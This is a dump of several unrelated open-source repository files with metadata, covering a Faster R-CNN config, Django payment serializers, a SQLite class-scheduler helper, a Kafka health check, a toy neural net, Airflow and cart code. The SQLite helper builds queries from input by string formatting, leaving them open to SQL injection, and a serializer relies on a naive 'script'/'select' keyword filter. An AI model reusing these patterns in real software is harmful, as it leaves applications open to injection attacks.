type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=81,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=5,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
img_scale=(1333, 800),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=False,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
img_scale=(1333, 800),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
img_scale=(1333, 800),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.0125, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
])
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_hr50_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
[
"mtj.ulicny@gmail.com"
] |
mtj.ulicny@gmail.com
|
11fca4c271e671c42c6ee613efc83330024896c5
|
9ac2a765ae71dfe2abb18de74bc6e6e58e82f79e
|
/payment/serializers.py
|
828ea3107df65edb0a220922606289859e31a61a
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
skyydq/GreaterWMS
|
aaa23bfa6894170692648d18110f6684e1dfe9b3
|
e14014a73b36ec0f0df03712a229b0931cb388fb
|
refs/heads/master
| 2023-05-26T00:46:52.541912
| 2021-06-10T09:07:40
| 2021-06-10T09:07:40
| 358,170,149
| 0
| 0
|
Apache-2.0
| 2021-04-15T07:39:02
| 2021-04-15T07:39:02
| null |
UTF-8
|
Python
| false
| false
| 4,317
|
py
|
from rest_framework import serializers
from .models import TransportationFeeListModel
from userprofile.models import Users
import re
from rest_framework.exceptions import APIException
def data_validate(data):
script_obj = re.findall(r'script', str(data), re.IGNORECASE)
select_obj = re.findall(r'select', str(data), re.IGNORECASE)
if script_obj:
raise APIException({'detail': 'Bad Data can‘not be store'})
elif select_obj:
raise APIException({'detail': 'Bad Data can‘not be store'})
else:
return data
def openid_validate(data):
if Users.objects.filter(openid=data).exists():
return data
else:
raise APIException({'detail': 'User does not exists'})
def appid_validate(data):
if Users.objects.filter(appid=data).exists():
return data
else:
raise APIException({'detail': 'User does not exists'})
class PaymentGetSerializer(serializers.ModelSerializer):
send_city = serializers.CharField(read_only=True, required=False)
receiver_city = serializers.CharField(read_only=True, required=False)
weight_fee = serializers.FloatField(read_only=True, required=False)
volume_fee = serializers.FloatField(read_only=True, required=False)
transportation_supplier = serializers.CharField(read_only=True, required=False)
creater = serializers.CharField(read_only=True, required=False)
create_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
update_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
class Meta:
model = TransportationFeeListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id']
class PaymentPostSerializer(serializers.ModelSerializer):
openid = serializers.CharField(read_only=False, required=False, validators=[openid_validate])
send_city = serializers.CharField(read_only=False, required=True, validators=[data_validate])
receiver_city = serializers.CharField(read_only=False, required=True, validators=[data_validate])
weight_fee = serializers.FloatField(read_only=False, required=True, validators=[data_validate])
volume_fee = serializers.FloatField(read_only=False, required=True, validators=[data_validate])
transportation_supplier = serializers.CharField(read_only=False, required=True, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = TransportationFeeListModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class PaymentUpdateSerializer(serializers.ModelSerializer):
send_city = serializers.CharField(read_only=False, required=True, validators=[data_validate])
receiver_city = serializers.CharField(read_only=False, required=True, validators=[data_validate])
weight_fee = serializers.FloatField(read_only=False, required=True, validators=[data_validate])
volume_fee = serializers.FloatField(read_only=False, required=True, validators=[data_validate])
transportation_supplier = serializers.CharField(read_only=False, required=True, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = TransportationFeeListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class PaymentPartialUpdateSerializer(serializers.ModelSerializer):
send_city = serializers.CharField(read_only=False, required=False, validators=[data_validate])
receiver_city = serializers.CharField(read_only=False, required=False, validators=[data_validate])
weight_fee = serializers.FloatField(read_only=False, required=False, validators=[data_validate])
volume_fee = serializers.FloatField(read_only=False, required=False, validators=[data_validate])
transportation_supplier = serializers.CharField(read_only=False, required=False, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=False, validators=[data_validate])
class Meta:
model = TransportationFeeListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
|
[
"4766704@qq.com"
] |
4766704@qq.com
|
13a680e7eea292e02a84ad747852bcc285b37918
|
5c5ce13ece5f8a0327fa752d5b1eb9057aae51d7
|
/ClassMate/classMateDB.py
|
3a5cddc551c230e6afc1c3c358479b4cc34d4c2f
|
[
"MIT"
] |
permissive
|
GFBryson/myProjects
|
1f4c428c9fc68f670c7375a9b40593e9dbb8c892
|
e7bb5ba825867eb39e95c7870a5d31a7615ccdb9
|
refs/heads/master
| 2018-10-10T02:49:59.467386
| 2018-10-09T02:03:59
| 2018-10-09T02:03:59
| 110,400,819
| 1
| 1
|
MIT
| 2018-06-23T02:47:32
| 2017-11-12T03:15:30
|
Python
|
UTF-8
|
Python
| false
| false
| 2,438
|
py
|
import datetime
import sqlite3
class sdb:
connection=None
cursor=None
def __init__(self):#needed to either create to or connect to the strug and maked the events table
self.connection = sqlite3.connect("classMate.db")
self.cursor = self.connection.cursor()
self.create_db()
def create_db(self):
print("in table maker")
sql_commands= [e for e in (open('build_db.txt','r').read()).split('--split--') if ('--' not in e)]
print("file read")
for c in sql_commands:
try:
self.cursor.execute(c)
except Exception as e:
raise e
print("executed")
self.connection.commit()
print("committed")
def add_channel(self,ch):
if self.cursor.execute('select * from channels where ch_id = "{channel}";'.format(channel=ch)).fetchall() == []:
self.cursor.execute('insert into channels(ch_id) values("{channel}");'.format(channel=ch))
def add_event(self,info):
self.cursor.execute('select ch_id from channels where ch_id ="{ch}";'.format(ch=info['channel']))
a=self.cursor.fetchall()
if a==[]:
return -1
sql_command = """INSERT INTO events (ev_id,date_time,ch_id,title,description,loc)
VALUES(NULL,"{date_time}","{channel}","{title}","{des}","{loc}");""".format(date_time=info['date'],channel=info['channel'],title=info['title'],des=info['desc'],loc=info['loc'])
self.cursor.execute(sql_command)
self.connection.commit()
return 1
def add_assignment(self,info):
self.cursor.execute('select ch_id from channels where ch_id ="{ch}";'.format(ch=info['channel']))
a=self.cursor.fetchall()
if a==[]:
return -1
sql_command = """INSERT INTO asssignments (a_id,date_time,ch_id,title,description,loc)
VALUES(NULL,"{date_time}","{channel}","{title}","{des}","{loc}");""".format(date_time=info['date'],channel=info['channel'],title=info['title'],des=info['desc'],loc=info['loc'])
self.cursor.execute(sql_command)
self.connection.commit()
return 1
def print_table(self,table):
self.cursor.execute("SELECT * FROM {tbl}".format(tbl=table))
result=self.cursor.fetchall()
for r in result:
print(r)
def get_events(self,order_by=None):
if order_by==None:
return self.cursor.execute("select * from events;").fetchall()
return self.cursor.execute("SELECT * FROM events ORDER BY '{order}'".format(order=order_by)).fetchall()
def select_event(self,ch):
return self.cursor.execute("select * from events where ch_id = '{channel}';".format(channel=ch)).fetchall()
|
[
"gillianfbryson@gmail.com"
] |
gillianfbryson@gmail.com
|
443ff33e4c6eefa91b9acadff67dba1d7c677efb
|
15d2e5a02013aa65b4048795c50235adf9b089df
|
/kafka_utils/kafka_check/commands/under_replicated.py
|
329327d381275b4293903d403777017a750d015d
|
[
"Apache-2.0"
] |
permissive
|
agentbond007/kafka-utils
|
89ab7822826a8135fdff78ea3cd8fe5c49437f17
|
64e8a11c42dbff969f7a8ca89fe7cfa208ed8ddf
|
refs/heads/master
| 2021-01-19T17:03:06.202505
| 2016-09-27T01:28:20
| 2016-09-27T01:28:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,392
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from kafka_utils.kafka_check import status_code
from kafka_utils.kafka_check.commands.command import get_broker_id
from kafka_utils.kafka_check.commands.command import KafkaCheckCmd
from kafka_utils.util.metadata import get_topic_partition_metadata
# This check will look on lines with that error-code in error field
# from kafka metadata response.
REPLICA_NOT_AVAILABLE_ERROR = 9
class UnderReplicatedCmd(KafkaCheckCmd):
def build_subparser(self, subparsers):
subparser = subparsers.add_parser(
'under_replicated',
description='Check under replicated partitions for all '
'brokers in cluster.',
help='This command will sum all under replicated partitions '
'for each broker if any. It will query jolokia port for '
'receive this data.',
)
subparser.add_argument(
'--first-broker-only',
action='store_true',
help='If this parameter is specified, it will do nothing and succeed '
'on not first brokers from Kafka cluster. Set --broker-id to -1 '
'to read broker-id from --data-path. Default: %(default)s',
)
return subparser
def run_command(self):
"""Under_replicated command, checks number of under replicated partitions for
all brokers in the Kafka cluster."""
broker_list = self.zk.get_brokers()
if self.args.first_broker_only:
if self.args.broker_id is None:
return status_code.WARNING, 'Broker id is not specified'
if not _check_run_on_first_broker(broker_list, self.args.broker_id, self.args.data_path):
return status_code.OK, 'Provided broker is not the first in broker-list.'
under_replicated = _get_under_replicated(
self.cluster_config.broker_list
)
if not under_replicated:
return status_code.OK, 'No under replicated partitions.'
else:
if self.args.verbose:
for (topic, partition) in under_replicated:
print('{topic}:{partition}'.format(
topic=topic,
partition=partition,
))
msg = "{under_replicated} under replicated partitions.".format(
under_replicated=len(under_replicated),
)
return status_code.CRITICAL, msg
def _check_run_on_first_broker(broker_list, broker_id, data_path):
"""Returns true if the first broker in broker_list the same as in args."""
broker_id = broker_id if broker_id != -1 else get_broker_id(data_path)
first_broker_id, _ = min(broker_list.items())
return broker_id == first_broker_id
def _process_topic_partition_metadata(topic_partitions_metadata):
"""Return set with under replicated partitions."""
under_replicated = set()
for partitions in topic_partitions_metadata.values():
for metadata in partitions.values():
if int(metadata.error) == REPLICA_NOT_AVAILABLE_ERROR:
under_replicated.add((metadata.topic, metadata.partition))
return under_replicated
def _get_under_replicated(broker_list):
"""Requests kafka-broker for metadata info for topics.
Then checks if topic-partition is under replicated and there are not enough
replicas in sync. Returns set of under replicated partitions.
:param dictionary broker_list: dictionary with brokers information, broker_id is key
:returns set: with under replicated partitions
* set: { (topic, partition), ... }
"""
metadata = get_topic_partition_metadata(broker_list)
return _process_topic_partition_metadata(metadata)
|
[
"alp@yelp.com"
] |
alp@yelp.com
|
fe8a9e471439cab989137c9047a9c494edb0f015
|
bf61570b714408206ee89b68c55d9e8041a3328c
|
/app/models/collection.py
|
11a502096824a78c7a0f5dceff707bd83fac29dd
|
[] |
no_license
|
Mox93/rizzmi
|
d77c5588eb3434bbfb98850d40da69a2661cc8a2
|
f0b1e8194e77abda8a8d54d26d83bd9359f13d0d
|
refs/heads/test_deploy
| 2023-05-11T07:34:26.896546
| 2019-11-28T15:38:39
| 2019-11-28T15:38:39
| 210,208,394
| 0
| 0
| null | 2023-05-02T18:32:27
| 2019-09-22T20:16:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,588
|
py
|
from common.db import db, ExtendedDocument, ExtendedEmbeddedDocument
class Connection(ExtendedEmbeddedDocument):
"""
A holder for information about the database collection
Its main fields are:
- name: the displayed name in the webapp
- dynamic_document: whether the collection should accept dynamic document or not
** the collection name in the database is the Connection's _id
"""
name = db.StringField(required=True, max_length=50, default="Untitled Collection")
dynamic_document = db.BooleanField(required=True, default=True)
class CollectionTemplateModel(ExtendedDocument):
"""
A template containing the fields of documents that are saved in the correlating collection.
Its main fields are:
- name: the name that will show in the collection list
- title: the title that will show in the top of the collection
- description: text that is displayed under the title
- fields: a list of all the fields in the order they show in the collection table
- db_connection: information about the actual database collection ## if exists
"""
meta = {'collection': 'collection_templates'}
name = db.StringField(required=True, max_length=50, default="Untitled Collection")
title = db.StringField(required=True, max_length=500, default="Untitled Collection")
description = db.StringField()
fields = db.EmbeddedDocumentListField(ExtendedEmbeddedDocument)
db_connection = db.EmbeddedDocumentField(Connection)
|
[
"mohamed.ragaiy.saleh@gmail.com"
] |
mohamed.ragaiy.saleh@gmail.com
|
896dfb44a55d9dbe50554c7400554f7e7df1b335
|
7aad8a550d134729a311dc8f733266dbee903ebc
|
/11_Lines_NN.py
|
ab9bb58c04c67f02874cbae65ee4aea82e213b53
|
[] |
no_license
|
PScipi0/11_Lines_NN
|
723d0ad1635f5948f4270932be07020efaaf5bc5
|
13ea56c7a4f3c07c193f9fa5a0185e9d4500e415
|
refs/heads/master
| 2021-04-04T22:33:43.337505
| 2020-03-19T15:02:00
| 2020-03-19T15:02:00
| 248,495,954
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,974
|
py
|
import numpy as np
# sigmoid function
def sigmoid(x, deriv = False):
if(deriv == True):
return x*(1 - x)
return 1 / (1 + np.exp(-x))
# input data
X = np.array([ [0, 0, 1],
[0, 1, 1],
[1, 0, 1],
[1, 1, 1] ])
# output data
y = np.array([[0, 0, 1, 1]]).T
# Seed for deterministic behaviour
np.random.seed(1)
# initialize weights randomly with mean 0
syn0 = 2*np.random.random((3,1)) - 1
print(syn0)
for iter in range(10000):
# forward propagation
l0 = X
l1 = sigmoid(np.dot(l0, syn0))
# calculate naive error
l1_error = y - l1
# print error to visualize training progress
if(iter % 1000 == 0):
print(l1_error)
# Naive learning approach
l1_delta = l1_error * sigmoid(l1, True)
# update weights
syn0 += np.dot(l0.T, l1_delta)
result1 = l1
y = np.array([[0, 1, 1, 0]]).T
# randomly initialize our weights with mean 0
syn0 = 2*np.random.random((3,4)) - 1
syn1 = 2*np.random.random((4,1)) - 1
for j in range(60000):
# Feed forward through layers 0, 1, and 2
l0 = X
l1 = sigmoid(np.dot(l0, syn0))
l2 = sigmoid(np.dot(l1, syn1))
# how much did we miss the target value?
l2_error = y - l2
if (j% 10000) == 0:
print("Error:" + str(np.mean(np.abs(l2_error))))
# in what direction is the target value?
# were we really sure? if so, don't change too much.
l2_delta = l2_error*sigmoid(l2,deriv=True)
# how much did each l1 value contribute to the l2 error (according to the weights)?
l1_error = l2_delta.dot(syn1.T)
# in what direction is the target value?
# were we really sure? if so, don't change too much.
l1_delta = l1_error * sigmoid(l1, deriv = True)
# update weigths
syn1 += l1.T.dot(l2_delta)
syn0 += l0.T.dot(l1_delta)
print("Output of first network after Training")
print(result1)
print("Output of second network after Training")
print(l2)
|
[
"mcgiver2@freenet.de"
] |
mcgiver2@freenet.de
|
5841e045b491f7081df66ceeb5c9175ca8d51e51
|
bea1cc36fd6ec0b37a4cda52163689ca7f3910b9
|
/파이썬문법/수 자료형의 연산.py
|
e60370edf63e62baf4a30d20f2cca67da5de291b
|
[] |
no_license
|
yeongwoojang/CordingTest-with-Python
|
13cbfd8945ce7259ab2c00701e1b3ef72d7656c4
|
2430ad506d7373a462f3783d9877e292965d30ec
|
refs/heads/main
| 2023-02-18T18:54:04.236701
| 2021-01-18T12:35:53
| 2021-01-18T12:35:53
| 330,416,427
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 145
|
py
|
#수 자료형의 연산
a=7
b=3
# 나누기
print(a/b)
# 나머지
print(a%b)
#몫
print(a//b)
# 거듭제곱
print(a**b) # a^b -> 7의3제곱
|
[
"noreply@github.com"
] |
yeongwoojang.noreply@github.com
|
27d5f039d1aac10122c7c5092b85fb85d45a9bd9
|
cb54551c71a91318822a15ba57a3a4b0d661ece6
|
/lesson4/hometask3.py
|
d9904d5fdca41ea8cedccdeed6eeab335e13d5fa
|
[] |
no_license
|
ElenaDolganova/Python-lesson-1
|
2384bf9ae5479e719f49684829fbd2ddce9eb3dc
|
c529ec9393f5aeee4dd2cd15d707df7a3c57c702
|
refs/heads/main
| 2023-05-13T17:51:07.981495
| 2021-06-03T15:43:51
| 2021-06-03T15:43:51
| 358,188,602
| 0
| 0
| null | 2021-06-03T15:43:51
| 2021-04-15T08:42:34
|
Python
|
UTF-8
|
Python
| false
| false
| 341
|
py
|
# Для чисел в пределах от 20 до 240 найти числа, кратные 20 или 21. Решите задание в одну строку.
# Подсказка: используйте функцию range() и генератор.
new_list = [i for i in range(20, 241) if i % 20 == 0 or i % 21 == 0]
print(new_list)
|
[
"elcorplus@mail.ru"
] |
elcorplus@mail.ru
|
9f50241da8d05157520332ef1b2a8ef56cdff637
|
110f823639b9cdfb70428e33e15c05ff08287db8
|
/sla_dag.py
|
c6c718b9fb6da70cb40e9489718d495228fc8cce
|
[] |
no_license
|
harish678/airflow
|
27cb00f66151e19557cdb99bfc69e2132fb8698d
|
5aa325251a01deb1aaa6d5e93a6f9f48b35cf2dc
|
refs/heads/main
| 2023-02-07T21:46:35.257103
| 2020-12-31T10:12:01
| 2020-12-31T10:12:01
| 325,768,155
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,079
|
py
|
from airflow import DAG
from datetime import datetime, timedelta
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
def log_sla_miss(dag, task_list, blocking_task_list, slas, blocking_tis):
print(
f"SLA was missed on DAG {dag.dag_id}s by task is {slas}s with task list: \
{task_list} which are blocking task id {blocking_tis}s with task list: {blocking_task_list}"
)
default_args = {
"owner": "airflow",
"start_date": datetime(2020, 1, 1, 23, 15, 0),
"depend_on_past": False,
"email": None,
"email_on_failure": False,
"email_on_retry": False,
"retries": 0
}
with DAG(dag_id="sla_dag",
schedule_interval="*/1 * * * *",
default_args=default_args,
sla_miss_callback=log_sla_miss,
catchup=False) as dag:
t0 = DummyOperator(task_id="t0")
t1 = BashOperator(task_id="t1",
bash_command="sleep 15",
sla=timedelta(seconds=5),
retries=0)
t0 >> t1
|
[
"harish678@outlook.com"
] |
harish678@outlook.com
|
9d8168f1cdedf3b05457fefb7d05eff66a698418
|
687db4c321d9e06fe780a2ee444f1e10648e1fc7
|
/manage.py
|
9c443460c05034eb3af4ea470ccc5845b3e6ae4d
|
[] |
no_license
|
nanoy42/yogo
|
e31c1e0f3a61bd9e874b21dd9b55c0e7e19858d9
|
d95d07ce65c7bc0491bdb41b9a4e90bf0ed33800
|
refs/heads/master
| 2021-12-14T22:15:49.430593
| 2018-06-16T16:42:37
| 2018-06-16T16:42:37
| 189,669,485
| 1
| 0
| null | 2021-11-29T18:00:11
| 2019-05-31T23:27:04
|
Python
|
UTF-8
|
Python
| false
| false
| 536
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "yogo.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
[
"me@nanoy.fr"
] |
me@nanoy.fr
|
c99227d1c8c33454bf0965a95d3156375bc33b64
|
a16bd2d3cd8c103be2c24c801fce92dc453823a1
|
/Tutorials/Libraries-Tools-Frameworks/BlockchainDev/SmartContractLottery/src/scripts/__init__.py
|
bf5cb77189d7e306d48e829f330c2c6fbc57f0ec
|
[] |
no_license
|
jerryq27/Cheatsheets
|
d7fb7c17d55e3b51ca349155fbaf13f9f6fda2db
|
f9afa5ffb7c031cf4b7932678f4686a38c542f27
|
refs/heads/master
| 2023-03-11T22:45:46.497858
| 2022-11-21T03:16:12
| 2022-11-21T03:16:12
| 168,776,030
| 6
| 0
| null | 2023-03-07T12:16:31
| 2019-02-02T00:07:10
|
Solidity
|
UTF-8
|
Python
| false
| false
| 55
|
py
|
# So Python recognizes the parent folder as a package.
|
[
"jerryq27@gmail.com"
] |
jerryq27@gmail.com
|
64576893967d9f80106f384a1dc7489d7cf1e906
|
802bffe032431a25c3239383e125f94a7b3b8c98
|
/carro/carro.py
|
36d286cfc29f24a96377b95de6bbee73a0d20258
|
[] |
no_license
|
JGiron21/Electronica-TICS
|
449d2162134cfda1bad041541fc804429bf287cd
|
c3ad86b626f03742baa30c2d5697d5b2a396d587
|
refs/heads/main
| 2023-09-03T15:06:17.669758
| 2021-11-11T03:01:13
| 2021-11-11T03:01:13
| 426,851,601
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,616
|
py
|
class Carro:
def __init__(self, request):
self.request=request
self.session=request.session
carro=self.session.get("carro")
if not carro:
carro=self.session["carro"]={}
#else:
self.carro=carro
def agregar(self, producto):
if(str(producto.id) not in self.carro.keys()):
self.carro[producto.id]={
"producto_id": producto.id,
"nombre": producto.nombre,
"precio": str(producto.precio),
"cantidad":1,
"imagen": producto.imagen.url
}
else:
for key, value in self.carro.items():
if key==str(producto.id):
value["cantidad"]=value["cantidad"]+1
break
self.guardar_carro()
def guardar_carro(self):
self.session["carro"]=self.carro
self.session.modified=True
def eliminar(self, producto):
producto.id=str(producto.id)
if producto.id in self.carro:
del self.carro[producto.id]
self.guardar_carro()
def restar_producto(self, producto):
for key, value in self.carro.items():
if key==str(producto.id):
value["cantidad"]=value["cantidad"]-1
if value["cantidad"]<1:
self.eliminar(producto)
break
self.guardar_carro()
def limpiar_carro(self):
carro=self.session["carro"]={}
self.session.modified=True
|
[
"noreply@github.com"
] |
JGiron21.noreply@github.com
|
06aba7e4a25889799cbd8d45b1a950d67744908b
|
170817af6e590bbf185c1a4ed4d4057f5362d5ca
|
/projects/travello/views.py
|
f62c75a038122b837c16043d6a1725af3bd57c39
|
[] |
no_license
|
MoisesEnrique/travello
|
a07b39096892c911820898dacd733945bfb00391
|
0b6887ea799b27cda193c8338b4c08ce40fc5fa4
|
refs/heads/master
| 2023-06-07T09:41:44.151800
| 2021-06-28T16:11:58
| 2021-06-28T16:11:58
| 377,649,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 480
|
py
|
from django.shortcuts import render
#importamos de models la clase Destination
from .models import Destination
# Create your views here.
# Creamos la funcion index, para que funcione con la creada en travello/urls.py.
def index(request): #recibira la solicitud del cliente
dests = Destination.objects.all() #recibe los objetos de la tabla Destinations
return render(request, 'index.html', {'dests': dests}) #le estamos pasando al index.html la lista de destinos
|
[
"moises.mac@gmail.com"
] |
moises.mac@gmail.com
|
a7587434ee4645c63e4ed7e6554dea102c9d18c0
|
309318310a47631162b4d057db6430f77d0be388
|
/server/system/MongoDBManager.py
|
d9a1247a1453c73e92b40fddeb0d2d7e74ae8dc5
|
[] |
no_license
|
17chuchu/Media-Analytics-Network-based
|
d76def61c43a722d3c17f6a62e33254205c5241c
|
00005aaa5ddd9ffed641918ac340e68b48c8bdf9
|
refs/heads/master
| 2022-04-18T19:38:09.618458
| 2020-03-23T09:23:57
| 2020-03-23T09:23:57
| 245,896,175
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,457
|
py
|
import json
import datetime
import uuid
import datetime
import time
import requests
import nltk
import pymongo
import tweepy
from django.db import connection
class MongoDBManager:
client = None
db = None
collection = None
mention = None
timeline = None
user = None
entities = None
replystatus = None
gottentimelineuser = None
@staticmethod
def setup():
MongoDBManager.client = pymongo.MongoClient("mongodb://localhost:27017/")
MongoDBManager.db = MongoDBManager.client["socialmediadatabase"]
MongoDBManager.collection = MongoDBManager.db["socialmediacollection"]
MongoDBManager.mention = MongoDBManager.db["socialmediamention"]
MongoDBManager.timeline = MongoDBManager.db["socialmediatimeline"]
MongoDBManager.user = MongoDBManager.db["socialmediauser"]
MongoDBManager.entities = MongoDBManager.db["socialmediaentities"]
MongoDBManager.replystatus = MongoDBManager.db["socialmediareplystatus"]
MongoDBManager.gottentimelineuser = MongoDBManager.db["gottentimelineuser"]
@staticmethod
def insertCollection(tweeter_post):
if(MongoDBManager.collection.find_one({ "id": tweeter_post["id"] })):
return
else:
data_id = MongoDBManager.collection.insert_one(tweeter_post).inserted_id
data_id = str(data_id)
tweeter_post["user"]["_id"] = data_id
tweeter_post["entities"]["_id"] = data_id
if(MongoDBManager.user.find_one({ "id": tweeter_post["user"]["id"] })):
MongoDBManager.user.delete_one({ "id": tweeter_post["user"]["id"] })
MongoDBManager.user.insert_one(tweeter_post["user"])
else:
MongoDBManager.user.insert_one(tweeter_post["user"])
MongoDBManager.entities.insert_one(tweeter_post["entities"])
print("streaming \t",data_id)
@staticmethod
def insertMention(mention):
if(MongoDBManager.mention.find_one({ "id": mention["id"] })):
return
else:
data_id = MongoDBManager.mention.insert_one(mention).inserted_id
data_id = str(data_id)
mention["user"]["_id"] = data_id
mention["entities"]["_id"] = data_id
if(MongoDBManager.user.find_one({ "id": mention["user"]["id"] })):
MongoDBManager.user.delete_one({ "id": mention["user"]["id"] })
MongoDBManager.user.insert_one(mention["user"])
else:
MongoDBManager.user.insert_one(mention["user"])
MongoDBManager.entities.insert_one(mention["entities"])
print("mention_timeline\t",data_id)
@staticmethod
def insertTimeline(timeline):
if(MongoDBManager.timeline.find_one({ "id": timeline["id"] })):
return
else:
data_id = MongoDBManager.timeline.insert_one(timeline).inserted_id
data_id = str(data_id)
timeline["user"]["_id"] = data_id
timeline["entities"]["_id"] = data_id
if(MongoDBManager.user.find_one({ "id": timeline["user"]["id"] })):
MongoDBManager.user.delete_one({ "id": timeline["user"]["id"] })
MongoDBManager.user.insert_one(timeline["user"])
else:
MongoDBManager.user.insert_one(timeline["user"])
MongoDBManager.entities.insert_one(timeline["entities"])
print("user_timeline\t",data_id)
@staticmethod
def insertReplyStatus(reply):
if(MongoDBManager.replystatus.find_one({ "id": reply["id"] })):
return
else:
data_id = MongoDBManager.replystatus.insert_one(reply).inserted_id
print("reply_status\t",data_id)
@staticmethod
def getMostActiveUser(ban_name_list):
result = {}
for user in MongoDBManager.collection.find():
if user["user"]["screen_name"] not in ban_name_list:
if(user["user"]["id"] in result):
result[user["user"]["id"]] += 1
else:
result[user["user"]["id"]] = 1
user_frequency = 0
top_user = ""
for user_id in result.keys():
if(result[user_id] >= user_frequency):
user_frequency = result[user_id]
top_user = user_id
return top_user
@staticmethod
def getMostActiveUsersIDByLimit(limit, ban_list):
result = {}
result_by_limit = []
for user in MongoDBManager.collection.find():
if(user["user"]["id"] not in ban_list):
if(user["user"]["id"] in result):
result[user["user"]["id"]] += 1
else:
result[user["user"]["id"]] = 1
